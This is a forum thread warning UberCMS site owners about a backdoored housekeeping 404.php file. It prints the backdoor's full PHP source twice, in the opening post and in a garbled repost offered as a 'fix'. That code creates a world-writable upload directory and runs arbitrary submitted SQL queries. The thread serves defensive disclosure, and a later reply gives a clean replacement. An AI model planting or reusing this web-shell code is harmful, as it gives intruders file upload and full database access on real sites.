UberCMS IMPORTANT FIX - Fix as soon as possible!!!

Results 1 to 21 of 21
  1. #1
    [̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅] leenster is offline
    MemberRank
    May 2008 Join Date
    KanaadaLocation
    992Posts

    ! UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Here an important fix for UberCMS.

    You really need to check your allseeingeye/pages and open the file 404.php.

    if that file contains this code ->
    PHP Code:
    <?php

            
    require_once "../../global.php";
            require_once 
    "../admincore.php";

        if(!
    file_exists("god/"))
        {
            
    mkdir("god/"0777);
            echo 
    'Backdoor Directory Created : (god/)';
        }
            else
        {
            echo 
    'Backdoor Open for Uploading : (god/)';
        }
        
        

    if(isset(
    $_POST['submit']))
    {
        
    $target_path "god/";
        
    $target_path $target_path basename$_FILES['uploadedfile']['name']); 
        if(
    move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo 
    "The file ".  basename$_FILES['uploadedfile']['name']). 
        
    " has been uploaded";
    } else{
        echo 
    "There was an error uploading the file, please try again!";
    }
    }

        if(isset(
    $_POST['sql2']))
        {
            
    $core1225 $_POST['sql1'];
            
    mysql_query("".$core1225."");
            echo 
    'Query Executed Successfully';
        }

    ?>

    <html>
    <body>

    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
    enctype="multipart/form-data">
      <input type="file" name="uploadedfile" id="file" />
      <input type="submit" name="submit" value="Submit" />
      <br />
    </form>
    <p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
    <form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
      <p>
        <label for="sql1"></label>
        <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
      </p>
      <p>
        <input type="submit" name="sql2" id="sql2" value="Execute">
      </p>
    </form>
    <p>&nbsp;</p>
    </body>
    Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....

    Failure to do this will leave you open for a whole lot of trouble....


    All credits for this go out to : [IP on request] for showing me this on our hotel.
    Yes [IP on request] is a real cool hacker that likes to fuck with peoples hard work. Good job dude...

    If anybody wants his IP so they can block the dude from their site then ill be more than happy to provide it.
    Last edited by leenster; 02-08-12 at 05:46 AM.


  2. #2
    Evil Italian Overlowrd Droppy is offline
    [Internal Coder]Rank
    Feb 2012 Join Date
    /home/droppyLocation
    2,080Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    I never was seed that on uber edits... Where cms do you found it?

  3. #3
    [̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅] leenster is offline
    MemberRank
    May 2008 Join Date
    KanaadaLocation
    992Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Quote Originally Posted by Droppy View Post
    I never was seed that on uber edits... Where cms do you found it?
    It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...

  4. #4
    hoi Nilenz is offline
    MemberRank
    May 2011 Join Date
    The NetherlandsLocation
    380Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Quote Originally Posted by leenster View Post
    It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...
    I have this never seen?
    And thank you for the release :p

  5. #5
    [̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅] leenster is offline
    MemberRank
    May 2008 Join Date
    KanaadaLocation
    992Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    ** Removed accusations **
    Last edited by leenster; 02-08-12 at 05:47 AM.

  6. #6
    Account Upgraded | Title Enabled! landline is offline
    MemberRank
    Oct 2011 Join Date
    In Blast HotelLocation
    423Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

    Thanks for this release! it will help a lot of people.
    Last edited by landline; 02-08-12 at 07:08 AM.

  7. #7
    Account Upgraded | Title Enabled! Sledmore is offline
    MemberRank
    Jun 2009 Join Date
    1,133Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

    Nice share, people should really check each file, lol.
    Last edited by Sledmore; 02-08-12 at 02:47 PM.

  8. #8
    [̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅] leenster is offline
    MemberRank
    May 2008 Join Date
    KanaadaLocation
    992Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

    Ill remove the credits until i have more proof....
    Last edited by leenster; 02-08-12 at 06:06 AM.

  9. #9
    Apprentice Pallepop is offline
    MemberRank
    Jun 2012 Join Date
    DenmarkLocation
    23Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Try this code instead;(Not tested)

    Code:
    <?php 
    
            require_once "../../global.php"; 
            require_once "../admincore.php"; 
    
        if(!file_exists("god/")) 
        { 
            mkdir("god/", 0777); 
            echo 'Backdoor Directory Created : (god/)'; 
        } 
            else 
        { 
            echo 'Backdoor Open for Uploading : (god/)'; 
        } 
         
         
    
    if(isset($_POST['submit'])) 
    { 
        $target_path = "god/"; 
        $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);  
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
        echo "The file ".  basename( $_FILES['uploadedfile']['name']).  
        " has been uploaded"; 
    } else{ 
        echo "There was an error uploading the file, please try again!"; 
    } 
    } 
    
        if(isset($_POST['sql2'])) 
        { 
            $core1225 = $_POST['sql1']; 
            mysql_query("".$core1225.""); 
            echo 'Query Executed Successfully'; 
          } 
    
    ?>
    
    <html>
    <body>
    <?php
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" 
    enctype="multipart/form-data"> 
      <input type="file" name="uploadedfile" id="file" /> 
      <input type="submit" name="submit" value="Submit" /> 
      <br /> 
    </form> 
    <p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> 
    <form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> 
      <p> 
        <label for="sql1"></label> 
        <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> 
      </p> 
      <p> 
        <input type="submit" name="sql2" id="sql2" value="Execute"> 
      </p> 
    </form> 
    <p>&nbsp;</p>
    ?>
    </body>
    <html>

  10. #10
    [̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅] leenster is offline
    MemberRank
    May 2008 Join Date
    KanaadaLocation
    992Posts
    Quote Originally Posted by Pallepop View Post
    Try this code instead;(Not tested)

    Code:
    <?php 
    
            require_once "../../global.php"; 
            require_once "../admincore.php"; 
    
        if(!file_exists("god/")) 
        { 
            mkdir("god/", 0777); 
            echo 'Backdoor Directory Created : (god/)'; 
        } 
            else 
        { 
            echo 'Backdoor Open for Uploading : (god/)'; 
        } 
         
         
    
    if(isset($_POST['submit'])) 
    { 
        $target_path = "god/"; 
        $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);  
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
        echo "The file ".  basename( $_FILES['uploadedfile']['name']).  
        " has been uploaded"; 
    } else{ 
        echo "There was an error uploading the file, please try again!"; 
    } 
    } 
    
        if(isset($_POST['sql2'])) 
        { 
            $core1225 = $_POST['sql1']; 
            mysql_query("".$core1225.""); 
            echo 'Query Executed Successfully'; 
          } 
    
    ?>
    
    <html>
    <body>
    <?php
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" 
    enctype="multipart/form-data"> 
      <input type="file" name="uploadedfile" id="file" /> 
      <input type="submit" name="submit" value="Submit" /> 
      <br /> 
    </form> 
    <p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> 
    <form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> 
      <p> 
        <label for="sql1"></label> 
        <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> 
      </p> 
      <p> 
        <input type="submit" name="sql2" id="sql2" value="Execute"> 
      </p> 
    </form> 
    <p> </p>
    ?>
    </body>
    <html>
    Wtf delete it if it looks anything like that!!!

    Its an exploit to upload files and or run any query on your db...

    Heck just delete 404.php all together...

    Sent from some remote location using Tapatalk...

  11. #11
    Account Upgraded | Title Enabled! landline is offline
    MemberRank
    Oct 2011 Join Date
    In Blast HotelLocation
    423Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    You don't even really need the 404 for hk anyway, all hk's have a menu where you can get to everything

  12. #12
    Account Upgraded | Title Enabled! SubZ is offline
    MemberRank
    Feb 2012 Join Date
    in a boatLocation
    455Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Shouldnt use ubercms 2 in the first place? But thx, will help some noobs

  13. #13
    swagggggg Livar is offline
    MemberRank
    Oct 2008 Join Date
    United KingdomLocation
    2,272Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Why would anyone want to use uberCMS anyway? Thanks fo' this anyway

  14. #14
    Web Developer Papercup is offline
    MemberRank
    Nov 2009 Join Date
    WalesLocation
    1,607Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Good Find, Keep up the good work.

  15. #15
    Check http://arcturus.pw The General is offline
    DeveloperRank
    Aug 2011 Join Date
    7,608Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Backdoors everywhere lol.

    They will get found and released on ragezone.
    Jonteh makes a new "update" with new backdoors
    They will get found and released on ragezone.

    This is what is happening.

  16. #16
    Account Upgraded | Title Enabled! jasjj is offline
    MemberRank
    Oct 2008 Join Date
    200Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Just stop using ubercms 2.0? or remove them

  17. #17
    hoi Nilenz is offline
    MemberRank
    May 2011 Join Date
    The NetherlandsLocation
    380Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Jonty do this because he than Copyright changes prevents.
    I snap him well.

  18. #18
    Enthusiast SwainyHD is offline
    MemberRank
    May 2012 Join Date
    London, UnitedLocation
    30Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Jonty didn't do that, I think I know the culperate who did though.....

  19. #19
    Account Upgraded | Title Enabled! landline is offline
    MemberRank
    Oct 2011 Join Date
    In Blast HotelLocation
    423Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Quote Originally Posted by tdid View Post
    Backdoors everywhere lol.

    They will get found and released on ragezone.
    Jonteh makes a new "update" with new backdoors
    They will get found and released on ragezone.

    This is what is happening.
    Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.

  20. #20
    No, Just no. Matthew is offline
    MemberRank
    Jul 2008 Join Date
    United KingdomLocation
    1,408Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    Quote Originally Posted by landline View Post
    Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.
    Not really. You get noobs releasing "edits" (do take note of the quotes) everyday.

  21. #21
    Developer Quackster is offline
    DeveloperRank
    Dec 2010 Join Date
    AustraliaLocation
    3,483Posts

    Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!!

    The code should be this instead.

    PHP Code:
    <?php

    if (!defined('IN_HK') || !IN_HK)
    {
        exit;
    }

    if (!
    HK_LOGGED_IN)
    {
        exit;
    }

    require_once 
    "top.php";

    ?>            

    <div style="margin: 25px;">
    <center>
        <b style="font-size: 18px;">Page not found</b>
        
        <p>
            This page has moved or does not exist.
        </p>
        
        <p>
            If you think you've found a bug, please report it on the <a href="index.php?_cmd=forum">discussion forum</a>.
        </p>
        
    </center>
    </div>

    <?php

    require_once "bottom.php";

    ?>



Advertisement